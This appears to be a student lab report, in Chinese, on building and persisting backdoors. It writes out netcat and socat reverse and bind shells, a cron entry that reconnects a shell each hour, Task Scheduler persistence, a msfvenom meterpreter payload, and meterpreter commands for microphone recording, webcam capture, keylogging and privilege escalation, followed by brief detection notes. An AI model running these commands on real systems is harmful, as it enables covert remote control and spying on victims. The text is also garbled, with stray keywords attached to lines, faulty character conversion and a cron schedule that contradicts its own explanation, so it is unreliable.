20155220 Exp2 後門原理與實踐

20155220 Exp2 後門原理與實踐

1.Windows得到Linux Shell

  • 在windows下,打開CMD,使用ipconfig指令查看本機IP
    linux

  • 而後使用ncat.exe程序,ncat.exe -l -p 5220監聽本機的5220端口web

  • 在kali端,使用nc指令的-e選項,nc 192.168.1.101(主機ip) 5220(所設置的端口) -e /bin/sh反向鏈接Windows主機的5220端口:
    shell

  • 隨後在windows端,就可使用kali的命令行了
    vim

2.Linux得到Windows Shell

  • 過程與以前的相似,先在Kali環境下用ifconfig查看IP

  • 使用nc指令,nc -l -p 5220,監聽5220端口windows

  • 而後,在windows,輸入ncat.exe -e cmd.exe 192.168.150.135 5220
    tcp

  • 而後,在kali端,就可使用windows的cmd了
    工具

3.使用netcat獲取主機操做Shell,cron啓動

  • 先在Windows系統下,用ncat.exe -l -p 5220,監聽5220端口測試

  • crontab -e指令編輯一條定時任務(輸入3,選vim.basic)ui

  • 在最後一行加入59 * * * * /bin/netcat 192.168.1.101 5220 -e /bin/sh,意思是在每一個小時的第30分鐘(爲測試結果方便所選時間最好離現實時間較近)反向鏈接Windows主機的5220端口,就會啓動cron
    命令行

  • 到時間後,便得到了Kali的shell,能夠輸入指令

4.使用socat獲取主機操做Shell, 任務計劃啓動

  • 在Windows系統下,打開控制面板->管理工具->任務計劃程序(可在控制面板直接搜索任務計劃),建立任務,填寫任務名稱後,新建一個觸發器:

  • 下載安裝socat軟件
    在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5220 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5220,同時把cmd.exe的stderr重定向到stdout上;

  • 建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行,或者能夠右鍵單擊,而後選擇運行也能夠

  • 而後在Kali環境下輸入指令socat - tcp:192.168.1.101:5220,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5220端口,此時能夠發現已經成功得到了一個cmd shell

5. 使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  • 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.135 LPORT=5220 -f exe > 20155220.exe生成後門程序(LHOST=kali linux的IP)

  • 而後經過nc指令將生成的後門程序傳送到Windows主機上

windows:ncat.exe -l 5220 > 20155220.exe

kali:nc 192.168.1.101 5220 < 20155220.exe

  • 在Kali上使用msfconsole指令進入msf控制檯,set payload windows/meterpreter/reverse_tcp,使用監聽模塊,設置payload,設置反彈回連的IP和端口

  • 設置完成後,利用exploit,執行監聽,在windows中,利用20155220.exe運行20155220.exe

  • 此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell

6.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  • 使用record_mic指令能夠截獲一段音頻
  • 使用webcam_snap指令可使用攝像頭進行拍照

  • 使用webcam stream指令可使用攝像頭進行錄像
  • 使用screenshot指令能夠進行截屏
  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄
  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功

基礎問題回答

1.例舉你能想到的一個後門進入到你係統中的可能方式?

  • 咱們在安裝一些應用軟件時
  • 登陸非法網頁時
  • 未開啓防火牆時

2.例舉你知道的後門如何啓動起來(win及linux)的方式?

  • windows:實驗中作過的方式有直接雙擊開啓後門程序、經過Windows->控制面板->管理工具啓動任務計劃程序、開機自啓動的後門、和其餘程序捆綁運行的後門程序
  • linux:經過在cron中添加任務,定時執行、經過一些腳本啓動後門程序、經過和其餘程序捆綁運行後門程序。

3.Meterpreter有哪些給你映像深入的功能?

  • 獲取目標主機攝像頭攝像頭攝像頭
  • 錄音
  • 記錄擊鍵功能,利用得當有可能得到密碼之類的

4.如何發現本身有系統有沒有被安裝後門?

  • 低級一點的後門程序估計尋常的殺毒軟件就能夠查殺,好比我此次實驗作的,一發送給主機就被360攔截了。
  • 至於隱藏的稍深一些的後門,例如與軟件捆綁的後門,能夠下載一些比較專業的監視軟件,例以下載者監視器1.0、Regmon704.rar等進行檢測。
相關文章
相關標籤/搜索